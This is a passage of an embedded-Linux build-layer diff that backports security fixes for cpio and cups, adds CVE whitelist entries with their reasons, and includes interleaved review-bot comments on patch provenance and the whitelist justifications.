+ while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
+ {
+- if (new_num_patterns >= max_new_patterns)
+- {
+- max_new_patterns += 1;
+- new_save_patterns = (char **)
+- xrealloc ((char *) new_save_patterns,
+- max_new_patterns * sizeof (char *));
+- }
++ if (new_num_patterns == max_new_patterns)
++ new_save_patterns = x2nrealloc (new_save_patterns,
++ &max_new_patterns,
++ sizeof (new_save_patterns[0]));
+ new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
+ ++new_num_patterns;
+ }
++
++ ds_free (&pattern_name);
++
+ if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
+ close_error (pattern_file_name);
+
+@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
+ in the file system. */
+
+ void
+-process_copy_in ()
++process_copy_in (void)
+ {
+ char done = false; /* True if trailer reached. */
+ FILE *tty_in = NULL; /* Interactive file for rename option. */
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..26e3dda 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
+ The format of the header depends on the compatibility (-c) flag. */
+
+ void
+-process_copy_out ()
++process_copy_out (void)
+ {
+- dynamic_string input_name; /* Name of file read from stdin. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file read from stdin. */
+ struct stat file_stat; /* Stat record for file. */
+ struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
+ /* Output header information. */
+@@ -605,7 +606,6 @@ process_copy_out ()
+ char *orig_file_name = NULL;
+
+ /* Initialize the copy out. */
+- ds_init (&input_name, 128);
+ file_hdr.c_magic = 070707;
+
+ /* Check whether the output file might be a tape. */
+@@ -657,14 +657,9 @@ process_copy_out ()
+ {
+ if (file_hdr.c_mode & CP_IFDIR)
+ {
+- int len = strlen (input_name.ds_string);
+ /* Make sure the name ends with a slash */
+- if (input_name.ds_string[len-1] != '/')
+- {
+- ds_resize (&input_name, len + 2);
+- input_name.ds_string[len] = '/';
+- input_name.ds_string[len+1] = 0;
+- }
++ if (!ds_endswith (&input_name, '/'))
++ ds_append (&input_name, '/');
+ }
+ }
+
+@@ -875,6 +870,7 @@ process_copy_out ()
+ (unsigned long) blocks), (unsigned long) blocks);
+ }
+ cpio_file_stat_free (&file_hdr);
++ ds_free (&input_name);
+ }
+
+
+diff --git a/src/copypass.c b/src/copypass.c
+index dc13b5b..62f31c6 100644
+--- a/src/copypass.c
++++ b/src/copypass.c
+@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
+ If `link_flag', link instead of copying. */
+
+ void
+-process_copy_pass ()
++process_copy_pass (void)
+ {
+- dynamic_string input_name; /* Name of file from stdin. */
+- dynamic_string output_name; /* Name of new file. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file from stdin. */
++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of new file. */
+ size_t dirname_len; /* Length of `directory_name'. */
+ int res; /* Result of functions. */
+ char *slash; /* For moving past slashes in input name. */
+@@ -65,25 +67,18 @@ process_copy_pass ()
+ created files */
+
+ /* Initialize the copy pass. */
+- ds_init (&input_name, 128);
+
+ dirname_len = strlen (directory_name);
+ if (change_directory_option && !ISSLASH (directory_name[0]))
+ {
+ char *pwd = xgetcwd ();
+-
+- dirname_len += strlen (pwd) + 1;
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, pwd);
+- strcat (output_name.ds_string, "/");
+- strcat (output_name.ds_string, directory_name);
++
++ ds_concat (&output_name, pwd);
++ ds_append (&output_name, '/');
+ }
+- else
+- {
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, directory_name);
+- }
+- output_name.ds_string[dirname_len] = '/';
++ ds_concat (&output_name, directory_name);
++ ds_append (&output_name, '/');
++ dirname_len = ds_len (&output_name);
+ output_is_seekable = true;
+
+ change_dir ();
+@@ -116,8 +111,8 @@ process_copy_pass ()
+ /* Make the name of the new file. */
+ for (slash = input_name.ds_string; *slash == '/'; ++slash)
+ ;
+- ds_resize (&output_name, dirname_len + strlen (slash) + 2);
+- strcpy (output_name.ds_string + dirname_len + 1, slash);
++ ds_reset (&output_name, dirname_len);
++ ds_concat (&output_name, slash);
+
+ existing_dir = false;
+ if (lstat (output_name.ds_string, &out_file_stat) == 0)
+@@ -333,6 +328,9 @@ process_copy_pass ()
+ (unsigned long) blocks),
+ (unsigned long) blocks);
+ }
++
++ ds_free (&input_name);
++ ds_free (&output_name);
+ }
+
+ /* Try and create a hard link from FILE_NAME to another file
+diff --git a/src/dstring.c b/src/dstring.c
+index e9c063f..358f356 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -20,8 +20,8 @@
+ #if defined(HAVE_CONFIG_H)
+ # include <config.h>
+ #endif
+-
+ #include <stdio.h>
++#include <stdlib.h>
+ #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
+ #include <string.h>
+ #else
+@@ -33,24 +33,41 @@
+ /* Initialiaze dynamic string STRING with space for SIZE characters. */
+
+ void
+-ds_init (dynamic_string *string, int size)
++ds_init (dynamic_string *string)
++{
++ memset (string, 0, sizeof *string);
++}
++
++/* Free the dynamic string storage. */
++
++void
++ds_free (dynamic_string *string)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xmalloc (size);
++ free (string->ds_string);
+ }
+
+-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */
++/* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string, int size)
++ds_resize (dynamic_string *string)
+ {
+- if (size > string->ds_length)
++ if (string->ds_idx == string->ds_size)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
++ 1);
+ }
+ }
+
++/* Reset the index of the dynamic string S to LEN. */
++
++void
++ds_reset (dynamic_string *s, size_t len)
++{
++ while (len > s->ds_size)
++ ds_resize (s);
++ s->ds_idx = len;
++}
++
+ /* Dynamic string S gets a string terminated by the EOS character
+ (which is removed) from file F. S will increase
+ in size during the function if the string from F is longer than
+@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
+ char *
+ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ {
+- int insize; /* Amount needed for line. */
+- int strsize; /* Amount allocated for S. */
+ int next_ch;
+
+ /* Initialize. */
+- insize = 0;
+- strsize = s->ds_length;
++ s->ds_idx = 0;
+
+ /* Read the input string. */
+- next_ch = getc (f);
+- while (next_ch != eos && next_ch != EOF)
++ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- if (insize >= strsize - 1)
+- {
+- ds_resize (s, strsize * 2 + 2);
+- strsize = s->ds_length;
+- }
+- s->ds_string[insize++] = next_ch;
+- next_ch = getc (f);
++ ds_resize (s);
++ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- s->ds_string[insize++] = '\0';
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = '\0';
+
+- if (insize == 1 && next_ch == EOF)
++ if (s->ds_idx == 0 && next_ch == EOF)
+ return NULL;
+ else
+ return s->ds_string;
+ }
+
++void
++ds_append (dynamic_string *s, int c)
++{
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = c;
++ if (c)
++ {
++ s->ds_idx++;
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = 0;
++ }
++}
++
++void
++ds_concat (dynamic_string *s, char const *str)
++{
++ size_t len = strlen (str);
++ while (len + 1 > s->ds_size)
++ ds_resize (s);
++ memcpy (s->ds_string + s->ds_idx, str, len);
++ s->ds_idx += len;
++ s->ds_string[s->ds_idx] = 0;
++}
++
+ char *
+ ds_fgets (FILE *f, dynamic_string *s)
+ {
+@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
+ {
+ return ds_fgetstr (f, s, '\0');
+ }
++
++/* Return true if the dynamic string S ends with character C. */
++int
++ds_endswith (dynamic_string *s, int c)
++{
++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
++}
+diff --git a/src/dstring.h b/src/dstring.h
+index b5135fe..f5b04ef 100644
+--- a/src/dstring.h
++++ b/src/dstring.h
+@@ -17,10 +17,6 @@
+ Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
+ Boston, MA 02110-1301 USA. */
+
+-#ifndef NULL
+-#define NULL 0
+-#endif
+-
+ /* A dynamic string consists of record that records the size of an
+ allocated string and the pointer to that string. The actual string
+ is a normal zero byte terminated string that can be used with the
+@@ -30,22 +26,25 @@
+
+ typedef struct
+ {
+- int ds_length; /* Actual amount of storage allocated. */
+- char *ds_string; /* String. */
++ size_t ds_size; /* Actual amount of storage allocated. */
++ size_t ds_idx; /* Index of the next free byte in the string. */
++ char *ds_string; /* String storage. */
+ } dynamic_string;
+
++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
+
+-/* Macros that look similar to the original string functions.
+- WARNING: These macros work only on pointers to dynamic string records.
+- If used with a real record, an "&" must be used to get the pointer. */
+-#define ds_strlen(s) strlen ((s)->ds_string)
+-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string)
+-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n)
+-#define ds_index(s, c) index ((s)->ds_string, c)
+-#define ds_rindex(s, c) rindex ((s)->ds_string, c)
++void ds_init (dynamic_string *string);
++void ds_free (dynamic_string *string);
++void ds_reset (dynamic_string *s, size_t len);
+
+-void ds_init (dynamic_string *string, int size);
+-void ds_resize (dynamic_string *string, int size);
++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
+ char *ds_fgetname (FILE *f, dynamic_string *s);
+ char *ds_fgets (FILE *f, dynamic_string *s);
+ char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
++void ds_append (dynamic_string *s, int c);
++void ds_concat (dynamic_string *s, char const *str);
++
++#define ds_len(s) ((s)->ds_idx)
++
++int ds_endswith (dynamic_string *s, int c);
++
+diff --git a/src/util.c b/src/util.c
+index 4421b20..6d6bbaa 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
+ FILE *tty_out; /* File for interacting with user. */
+ int old_tape_des;
+ char *next_archive_name;
+- dynamic_string new_name;
++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
+ char *str_res;
+
+- ds_init (&new_name, 128);
+-
+ /* Open files for interactive communication. */
+ tty_in = fopen (TTY_NAME, "r");
+ if (tty_in == NULL)
+@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
+ error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
+ old_tape_des, tape_des);
+
+- free (new_name.ds_string);
++ ds_free (&new_name);
+ fclose (tty_in);
+ fclose (tty_out);
+ }
+--
+2.25.1
+
+
+From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 11 Aug 2021 18:10:38 +0300
+Subject: [PATCH 2/3] Fix previous commit
+
+* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
+loop.
+---
+ src/dstring.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 358f356..90c691c 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -64,7 +64,7 @@ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+ while (len > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ s->ds_idx = len;
+ }
+
+@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+ while (len + 1 > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
+
+From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 18 Aug 2021 09:41:39 +0300
+Subject: [PATCH 3/3] Fix dynamic string reallocations
+
+* src/dstring.c (ds_resize): Take additional argument: number of
+bytes to leave available after ds_idx. All uses changed.
+---
+ src/dstring.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 90c691c..0f597cc 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
+ /* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string)
++ds_resize (dynamic_string *string, size_t len)
+ {
+- if (string->ds_idx == string->ds_size)
++ while (len + string->ds_idx >= string->ds_size)
+ {
+ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
+ 1);
+@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
+ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+- while (len > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ s->ds_idx = len;
+ }
+
+@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ /* Read the input string. */
+ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = '\0';
+
+ if (s->ds_idx == 0 && next_ch == EOF)
+@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ void
+ ds_append (dynamic_string *s, int c)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = c;
+ if (c)
+ {
+ s->ds_idx++;
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = 0;
+ }
+ }
+@@ -115,8 +114,7 @@ void
+ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+- while (len + 1 > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index 9e35a80f8b..5ab567f360 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+ file://CVE-2021-38185.patch \
+ file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
+ file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
"
SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
inherit autotools gettext texinfo
+# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
+CVE_CHECK_WHITELIST += "CVE-2010-4226"
+
EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
do_install () {
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
index 82995219dc..9cdb71f1a1 100644
--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
SUMMARY = "Password strength checker library"
-HOMEPAGE = "http://sourceforge.net/projects/cracklib"
+HOMEPAGE = "https://github.com/cracklib/cracklib"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"
diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc
index c5a60bde12..6cfe314f20 100644
--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,11 +13,23 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
file://0002-don-t-try-to-run-generated-binaries.patch \
file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
file://0004-cups-fix-multilib-install-file-conflicts.patch\
+ file://CVE-2022-26691.patch \
+ file://CVE-2023-32324.patch \
+ file://CVE-2023-34241.patch \
+ file://CVE-2023-32360.patch \
+ file://CVE-2023-4504.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
UPSTREAM_CHECK_REGEX = "cups-(?P<pver>\d+\.\d+(\.\d+)?)-source.tar"
+# Issue only applies to MacOS
+CVE_CHECK_WHITELIST += "CVE-2008-1033"
+# Issue affects pdfdistiller plugin used with but not part of cups
+CVE_CHECK_WHITELIST += "CVE-2009-0032"
+# This is an Ubuntu only issue.
+CVE_CHECK_WHITELIST += "CVE-2018-6553"
+
LEAD_SONAME = "libcupsdriver.so"
CLEANBROKEN = "1"
@@ -34,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
-PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd"
+PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
EXTRA_OECONF = " \
@@ -45,6 +57,9 @@ EXTRA_OECONF = " \
--enable-debug \
--disable-relro \
--enable-libusb \
+ --with-system-groups=lpadmin \
+ --with-cups-group=lp \
+ --with-domainsocket=/run/cups/cups.sock \
DSOFLAGS='${LDFLAGS}' \
"
@@ -106,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
cups_sysroot_preprocess () {
sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
}
+
+# -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is
+# root:root, so this doesn't apply.
+CVE_CHECK_WHITELIST += "CVE-2021-25317"
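Review bot: The CVE-2021-25317 whitelist entry rests on `/var/log/cups` being root:root, but nothing in the visible hunks sets or checks that ownership, and the same commit starts passing `--with-cups-group=lp` to configure. It is worth confirming on a built image that the log directory is still root-owned, and tying the comment to whatever guarantees it, for example `# ownership is set in <install step>; re-check this entry if that changes`. Without that link, a later packaging change could invalidate the justification while cve-check keeps treating the CVE as not applicable.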
diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
new file mode 100644
index 0000000000..1fa5a54c70
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
@@ -0,0 +1,33 @@
+From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 26 May 2022 06:27:04 +0200
+Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes
+ CVE-2022-26691)
+
+The previous algorithm didn't expect the strings can have a different
+length, so one string can be a substring of the other and such substring
+was reported as equal to the longer string.
+
+CVE: CVE-2022-26691
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444]
+Signed-off-by: Steve Sakoman
+
+---
+diff --git a/scheduler/cert.c b/scheduler/cert.c
+index b268bf1b2..9b65b96c9 100644
+--- a/scheduler/cert.c
++++ b/scheduler/cert.c
+@@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */
+ b ++;
+ }
+
+- return (result);
++ /*
++ * The while loop finishes when *a == '\0' or *b == '\0'
++ * so after the while loop either both *a and *b == '\0',
++ * or one points inside a string, so when we apply logical OR on *a,
++ * *b and result, we get a non-zero return value if the compared strings don't match.
++ */
++
++ return (result | *a | *b);
+ }
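Review bot: The `Signed-off-by: Steve Sakoman` trailer in this patch header carries no e-mail address, unlike the trailers in the other CVE patches added by this commit. The trailer is the audit trail for who imported the backport, so it should be complete, in the form `Signed-off-by: Steve Sakoman <ADDRESS>` (placeholder; the address is not on this page). Only the tail of `ctcompare` is in the inner hunk, so the loop the new return statement relies on is not visible here.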
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
new file mode 100644
index 0000000000..40b89c9899
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch
@@ -0,0 +1,36 @@
+From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Thu, 1 Jun 2023 12:04:00 +0200
+Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324)
+
+CVE: CVE-2023-32324
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589]
+
+(cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e)
+Signed-off-by: Sanjay Chitroda <schitrod@cisco.com>
+---
+ cups/string.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/cups/string.c b/cups/string.c
+index 93cdad19..6ef58515 100644
+--- a/cups/string.c
++++ b/cups/string.c
+@@ -1,6 +1,7 @@
+ /*
+ * String functions for CUPS.
+ *
++ * Copyright © 2023 by OpenPrinting.
+ * Copyright © 2007-2019 by Apple Inc.
+ * Copyright © 1997-2007 by Easy Software Products.
+ *
+@@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */
+ size_t srclen; /* Length of source string */
+
+
++ if (size == 0)
++ return (0);
++
+ /*
+ * Figure out how much room is needed...
+ */
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
new file mode 100644
index 0000000000..4d39e1e57f
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch
@@ -0,0 +1,31 @@
+From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001
+From: Michael R Sweet <michael.r.sweet@gmail.com>
+Date: Tue, 6 Dec 2022 09:04:01 -0500
+Subject: [PATCH] Require authentication for CUPS-Get-Document.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913]
+CVE: CVE-2023-32360
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ conf/cupsd.conf.in | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in
+index b258849078..a07536f3e4 100644
+--- a/conf/cupsd.conf.in
++++ b/conf/cupsd.conf.in
+@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@
+ Order deny,allow
+ </Limit>
+
+- <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document>
++ <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job>
++ Require user @OWNER @SYSTEM
++ Order deny,allow
++ </Limit>
++
++ <Limit CUPS-Get-Document>
++ AuthType Default
+ Require user @OWNER @SYSTEM
+ Order deny,allow
+ </Limit>
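Review bot: This fix changes only the `conf/cupsd.conf.in` template, so it protects only systems that install the regenerated default `cupsd.conf`. An image or layer that ships its own `cupsd.conf`, or a device that keeps its existing configuration across an update, would still serve `CUPS-Get-Document` without `AuthType Default`. One sentence in the patch header would make that explicit, e.g. `Note: only the default cupsd.conf is changed; custom configurations need the same <Limit CUPS-Get-Document> block.`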
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
new file mode 100644
index 0000000000..816efc2946
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
@@ -0,0 +1,65 @@
+From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001
+From: Rose <83477269+AtariDreams@users.noreply.github.com>
+Date: Thu, 1 Jun 2023 11:33:39 -0400
+Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection
+
+httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to.
+
+We have to log the hostname first.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2]
+CVE: CVE-2023-34241
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ scheduler/client.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/scheduler/client.c b/scheduler/client.c
+index 91e441188c..327473a4d1 100644
+--- a/scheduler/client.c
++++ b/scheduler/client.c
+@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ /*
+ * Can't have an unresolved IP address with double-lookups enabled...
+ */
+-
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "Name lookup failed - connection from %s closed!",
++ "Name lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
+
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ * with double-lookups enabled...
+ */
+
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "IP lookup failed - connection from %s closed!",
++ "IP lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+
+ if (!hosts_access(&wrap_req))
+ {
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+ "Connection from %s refused by /etc/hosts.allow and "
+ "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
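Review bot: The `From` line of this patch names commit ffd290b4ab247f82722927ba9b21358daa16dbf1 while `Upstream-Status` links to 9809947a959e18409dcf562a3466ef246cb90cb2, and the header does not say how the two relate. CVE-2023-4504.patch has the same mismatch (a9a7daa77699… in `From`, 2431caddb7e6… in `Upstream-Status`), whereas CVE-2023-32324.patch explains its own with a `(cherry picked from commit …)` line. Adding the equivalent line to both headers lets a reviewer check each backport against one unambiguous upstream object.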
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
new file mode 100644
index 0000000000..be0db1fbd4
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
@@ -0,0 +1,40 @@
+From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Fri, 1 Sep 2023 16:47:29 +0200
+Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504
+
+We didn't check for end of buffer if it looks there is an escaped
+character - check for NULL terminator there and if found, return NULL
+as return value and in `ptr`, because a lone backslash is not
+a valid PostScript character.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31]
+CVE: CVE-2023-4504
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ cups/raster-interpret.c | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+--- a/cups/raster-interpret.c
++++ b/cups/raster-interpret.c
+@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S
+
+ cur ++;
+
+- if (*cur == 'b')
++ /*
++ * Return NULL if we reached NULL terminator, a lone backslash
++ * is not a valid character in PostScript.
++ */
++
++ if (!*cur)
++ {
++ *ptr = NULL;
++
++ return (NULL);
++ }
++
++ if (*cur == 'b')
+ *valptr++ = '\b';
+ else if (*cur == 'f')
+ *valptr++ = '\f';
